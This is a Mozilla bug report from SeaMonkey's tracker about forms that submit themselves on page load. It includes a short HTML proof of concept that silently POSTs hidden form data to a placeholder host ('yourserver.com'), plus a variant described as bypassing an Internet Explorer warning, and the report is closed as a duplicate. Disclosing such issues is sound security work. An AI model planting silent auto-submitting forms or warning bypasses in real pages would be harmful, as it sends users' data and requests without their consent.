Closed
Bug 283557
Opened 19 years ago
Closed 19 years ago
automatic form submit exploit in JavaScript function form.submit()
Categories
(SeaMonkey :: General, defect)
SeaMonkey
General
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 176079
People
(Reporter: DeKus, Unassigned)
References
()
Details
Attachments
(1 file)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050218 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050218 I recently figured out that you can actually force Mozilla to submit forms on load. I looked around the bug, but I really couldn't find one related to this security issue. I don't exactly know if it reflects to other OS or platforms, but I assume so, so this needs confirmation. Example for a script that will do what descripted: -snip- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <title>I'll forward you</title> </head> <body> <form action="http://yourserver.com/" method="POST" name="send"> <input type="hidden" name="name" value="value"> <script language='JavaScript' type="text/javascript">send.submit();</script> </form> </body> </html> -snap- this will automatically load the given URL in action= and will load popups etc. like the page would have been loaded on user request. In Internet EXplorer the above Code would result to a warning, but it can easily be bypassed by using this javascript part instead of the above: -snip- <script type="text/javascript"> <!-- function sendsubmit() { send.submit(); } //--> </script> </head> ... <script type="text/javascript">sendsubmit();</script> -snap- of course both will work in my current Mozilla release. Please tell me, if you need further informations What I would like to fix: maybe you add an extra option to prefences to disable autosubmitting forms and/or to specify custom excludes from increased JavaScript security levels (in which high security default it would be disbabled of course ;)). NOTE: The page listed might blow your system, if the bug is present for you it will constantly open new browser windows untill you kill the process. Reproducible: Always Steps to Reproduce: 1. load page with exploiting JavaScript code 2. watch the show Actual Results: automatic form submit which possibility leads to popups and reloading itself again until you kill the process or run out of memory Expected Results: no submit without user input
Comment 2•19 years ago
|
||
Automatic form submission used to allow opening pop-ups, but that was fixed in bug 210560. Other than that, automatic form submission is not a security hole.
hmm, sorry, seems my searching for blaming the JavaScript did not display the other bug. I just checked my example URL the one in the "resolved bug" with build 20050225, but still popups in both. I am sorry, if such bugs are usually not threat as security relevant ones.
Comment 4•19 years ago
|
||
If onload form submit were blocked sites could still transmit information in other ways, for instance in the query string of an image they load. The code in the attachment uses flash to bypass the popup blocker. That's bug 176079 *** This bug has been marked as a duplicate of 176079 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•